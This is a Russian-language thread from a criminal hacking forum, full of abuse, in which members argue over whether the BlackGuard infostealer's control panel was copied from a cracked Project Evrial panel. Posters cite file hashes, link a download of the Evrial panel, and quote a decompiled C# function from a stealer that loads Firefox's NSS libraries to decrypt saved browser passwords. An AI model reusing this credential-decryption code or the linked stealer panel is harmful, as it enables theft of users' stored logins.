• XSS.stack #1 – первый литературный журнал от юзеров форума

Техническое обсуждение стилера BlackGuard

Я думал, что пиздаболы, как ТС только на лолзе сидят и выдают чужое за свое. Пришлось зарегаться по просьбе Ленского. Но почитав топик по арбитражу - был немного в а**е. Панель, за которую был создан арбитраж то кряка Project Evrial. Софт был таким же дерьмищем, как и у ТС. Отличия только в отступах, где-то убрал, а где-то добавил. Скрипт rec.php идентичен на 100%. Сравним хэш и б*я, что мы видим? А то, что оба имеют один и тот же 5FC2DCEF9B352C88DFB26A80A41C0BE179EFEDEE. Совпадение? Не думаю. Сравним 2 файла по тексту:
3c95733debf2bf388c8e488e4c6f1f30.png

Отличие просто в 0 символов. И после этого ты будешь людям ссать в уши, что панель твоя и в паблике ее нет? Ладно напишем человеку, который ее писал и спросим.
9f30d0a040e6fa0fa4e9fca1211de33d.png

О баге было извесно и он был фиксанут, не в одном гавностилере она юзалась, но даже тут ты смог усраться. По коду я уже не буду проходить, а то уйдешь в великую депресию. Но посоветую подучить язык и опустить свое "кодерское ЧСВ" до уровня плинтуса.
Мораль сей басни такова, что не х*й открывать рот, когда код пиз*ен*й.

З.Ы. Сама панель Evrial с которой было сравнение. https://www.sendspace.com/file/kflbym

есть 2 варианта. он или ничего бы не сделал(собрать не смогбы). или это былабы одна сплошная паста.
Посмотрев код, могу сказать, что пасты в нем более чем достаточно
Не утруждал он себя чтобы сделать качественный продукт
Х*як, х*як и в продакшн.

Пожалуйста, обратите внимание, что пользователь заблокирован
blackteam007 Я вас лично попросил "без оскорбление" в топике!!! А Вы поливаете всех грязью.
дружище мне все равно если какой то чудик поливает грязью то я не собираюсь сидеть и молчать хочешь давай бан мне выписывай че ты

Посмотрев код, могу сказать, что пасты в нем более чем достаточно
Не утруждал он себя чтобы сделать качественный продукт
Х*як, х*як и в продакшн.
Какие люди) А панельку узнаешь?

Я думал, что пиздаболы, как ТС только на лолзе сидят и выдают чужое за свое. Пришлось зарегаться по просьбе Ленского. Но почитав топик по арбитражу - был немного в а**е. Панель, за которую был создан арбитраж то кряка Project Evrial. Софт был таким же дерьмищем, как и у ТС. Отличия только в отступах, где-то убрал, а где-то добавил. Скрипт rec.php идентичен на 100%. Сравним хэш и б*я, что мы видим? А то, что оба имеют один и тот же 5FC2DCEF9B352C88DFB26A80A41C0BE179EFEDEE. Совпадение? Не думаю. Сравним 2 файла по тексту:

Отличие просто в 0 символов. И после этого ты будешь людям ссать в уши, что панель твоя и в паблике ее нет? Ладно напишем человеку, который ее писал и спросим.

О баге было извесно и он был фиксанут, не в одном гавностилере она юзалась, но даже тут ты смог усраться. По коду я уже не буду проходить, а то уйдешь в великую депресию. Но посоветую подучить язык и опустить свое "кодерское ЧСВ" до уровня плинтуса.

З.Ы. Сама панель Evrial с которой было сравнение. https://www.sendspace.com/file/kflbym
уже конечно итак все было понятно ) но пруфы лишними не бывают )

Пост еще модеры не окнули
А так я там рассписал все
66cb4efb5c99b38eba52b87465a17d21.png
свои высеры для себя оставь лол))) мне чисто поебать на твое дерьмо которое ты высрал тут ))) совпадение одного файла он нашел дебил бл#ть

ты перечитай внимательно потом губы раскатывай))) я даже и не скрывал что за основу был взят евриал так что гуляй иди дальше со своим высером

гонимый ты конечно)))

твоя панель гавно
мне твой файл rec.php вообще в х#й не упирался
так что обосрался ты друг

свои высеры для себя оставь лол))) мне чисто поебать на твое дерьмо которое ты высрал тут ))) совпадение одного файла он нашел дебил бл#ть

ты перечитай внимательно потом губы раскатывай))) я даже и не скрывал что за основу был взят евриал так что гуляй иди дальше со своим высером
Лол ты.
Ты хоть знаешь кто тебе написал?
Нет не знаешь потому что ты еще пешком под стол ходил.

Лол ты.
Ты хоть знаешь кто тебе написал?
Нет не знаешь потому что ты еще пешком под стол ходил.
причем тут это вообще сидеть и усираться утверждая что моя панель и его панель на 100% идентична будь он хоть президентом это не дает никакого права сидеть и разрываться утверждая какую то херню что я тупо юзаю его панель она можно сказать полностью почти переделана мной уже и стала намного лучше так что мне как бы по фану че он там говорит или сливает)))

в этой теме я уже писал что за основу была взята панель от евриала так что считаю что данные высеры тут не уместны от слова совсем)) бесмыссленная херна идет какая то.
ради чего? чтобы тебя посчитали пиздатым каким то? или для чего занимаетесь реально всякой херней ну это не серьезно с вашей стороны

пишите арбитражи хули вы сидите и ноете и чешете всякую ересь берите и пишите нахуй вы сидите и набиваете себе сообщений)))
есть что то предьявить или кого то я кинул на деньги берите и пишите арбитраж с подробными пруфами, если нету то прекращайте ерундой уже заниматься

Я Эвриал шатал и в разработке админки участвовал
Админка написана была командой XakFor.Net
Ты не взял за основу, а ты просто спиздил и открываешь пасть, что взято за основу
Если ты думаешь, что можешь ебнуть пору стилей и строк кода, а потом бегать и орать, что твое, то огорчу тебя
Но у тебя хватает ума открывать пасть в теме и кричать, что панель твоя и за это должны дать бан
Кодер, который делал админку пруфнул, что это его первая версия
А вот админки высера Evrial не было в паблике и поэтому ее мы писали
Я прикрепил всю панель с которой сравнивалось, а на скринах я привел в пример только 1 из файлов
Включай мозги и не пиши херню
А посему качаешь панель, которую я прикрепил и в очередной раз усираешься

пишите арбитражи хули вы сидите и ноете и чешете всякую ересь берите и пишите нахуй вы сидите и набиваете себе сообщений)))
есть что то предьявить или кого то я кинул на деньги берите и пишите арбитраж с подробными пруфами, если нету то прекращайте ерундой уже заниматься
Зачем писать какие-то арбитражи?
Это по твоей части
Тебе тут люди объясняют, что ты не прав, но ты гнешь свою линию
Зачем доказывать то, что на деле != truth

причем тут это вообще сидеть и усираться утверждая что моя панель и его панель на 100% идентична будь он хоть президентом это не дает никакого права сидеть и разрываться утверждая какую то херню что я тупо юзаю его панель она можно сказать полностью почти переделана мной уже и стала намного лучше так что мне как бы по фану че он там говорит или сливает)))

в этой теме я уже писал что за основу была взята панель от евриала так что считаю что данные высеры тут не уместны от слова совсем)) бесмыссленная херна идет какая то.
ради чего? чтобы тебя посчитали пиздатым каким то? или для чего занимаетесь реально всякой херней ну это не серьезно с вашей стороны
Потому, что это был наш кряк и панель наша
Мы ее делали
da94121e6ebed23f18d01635e5dac0c4.png

Спешл фо ю даже нашел сорсы той панели
Там даже билды Эвриала есть
Поэтому я знаю, что говорю - панель пизжена и переделана малость

А вот кстати, нафига ваще грузить nss? в System.Cryptography есть и 3des,aes,hmac,sha1 без какого-то гемора и сразу исчезнет и с разрядностью дллки проблема

А вот кстати, нафига ваще грузить nss? в System.Cryptography есть и 3des,aes,hmac,sha1 без какого-то гемора и сразу исчезнет и с разрядностью дллки проблема
Потому, что он спиздил позаимствовал это из Калибра и не вдавался в подробности:
C#:
// Token: 0x060002C9 RID: 713 RVA: 0x0000A528 File Offset: 0x00008728
    public static bool smethod_0(string string_0)
    {
        if (!Environment.Is64BitProcess)
        {
            throw new GrabberException(GrabberError.ProcessIsNot64Bit, "The current process is 32-bit! To decrypt firefox values it needs to be 64-bit");
        }
        if (!File.Exists(string_0 + "\\mozglue.dll"))
        {
            throw new GrabberException(GrabberError.Nss3NotFound, "MozGlue was not found: " + string_0 + "\\mozglue.dll");
        }
        if (!File.Exists(string_0 + "\\nss3.dll"))
        {
            throw new GrabberException(GrabberError.Nss3NotFound, "NSS3 was not found: " + string_0 + "\\nss3.dll");
        }
        Class38.intptr_1 = Class36.LoadLibrary(string_0 + "\\mozglue.dll");
        Class38.intptr_0 = Class36.LoadLibrary(string_0 + "\\nss3.dll");
        if (Class38.intptr_1 == IntPtr.Zero)
        {
            throw new GrabberException(GrabberError.MozGlueNotFound, "\\mozglue.dll could not be found: " + string_0 + "\\mozglue.dll");
        }
        if (Class38.intptr_0 == IntPtr.Zero)
        {
            throw new GrabberException(GrabberError.Nss3NotFound, "\\nss3.dll could not be found: " + string_0 + "\\nss3.dll");
        }
        IntPtr procAddress = Class36.GetProcAddress(Class38.intptr_0, "NSS_Init");
        IntPtr procAddress2 = Class36.GetProcAddress(Class38.intptr_0, "PK11SDR_Decrypt");
        IntPtr procAddress3 = Class36.GetProcAddress(Class38.intptr_0, "NSS_Shutdown");
        if (procAddress == IntPtr.Zero)
        {
            throw new GrabberException(GrabberError.AddressNotFound, "Process Address of NSS_Init was not found!");
        }
        if (procAddress2 == IntPtr.Zero)
        {
            throw new GrabberException(GrabberError.AddressNotFound, "Process Address of PK11SDR_Decrypt was not found!");
        }
        if (procAddress3 == IntPtr.Zero)
        {
            throw new GrabberException(GrabberError.AddressNotFound, "Process Address of NSS_Shutdown was not found!");
        }
        Class38.delegate0_0 = (Class37.Delegate0)Marshal.GetDelegateForFunctionPointer(procAddress, typeof(Class37.Delegate0));
        Class38.delegate2_0 = (Class37.Delegate2)Marshal.GetDelegateForFunctionPointer(procAddress2, typeof(Class37.Delegate2));
        Class38.delegate1_0 = (Class37.Delegate1)Marshal.GetDelegateForFunctionPointer(procAddress3, typeof(Class37.Delegate1));
        if (Class38.delegate0_0 == null)
        {
            throw new GrabberException(GrabberError.FunctionNotFound, "Function 'NSS_Init()' was not found!");
        }
        if (Class38.delegate2_0 == null)
        {
            throw new GrabberException(GrabberError.FunctionNotFound, "Function 'PK11SDR_Decrypt()' was not found!");
        }
        if (Class38.delegate1_0 == null)
        {
            throw new GrabberException(GrabberError.FunctionNotFound, "Function 'NSS_Shutdown()' was not found!");
        }
        return Class38.delegate0_0 != null && Class38.delegate2_0 != null && Class38.delegate1_0 != null;
    }

Мы ее делали

че пиздишь та что панель полностью ваша х#йню чешешь какую то малость переделана прекращайте уже ерундой откровенной заниматься

Мы ее делали

прежде чем что то сидеть и втирать лучше подумай 100 раз а если не думается то пиши арбитраж на меня

если есть что конкретно мне предъявить то пишите арбитражи а не сидите тут круглосуточно и не занимайтесь ерундой бессмысленной

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх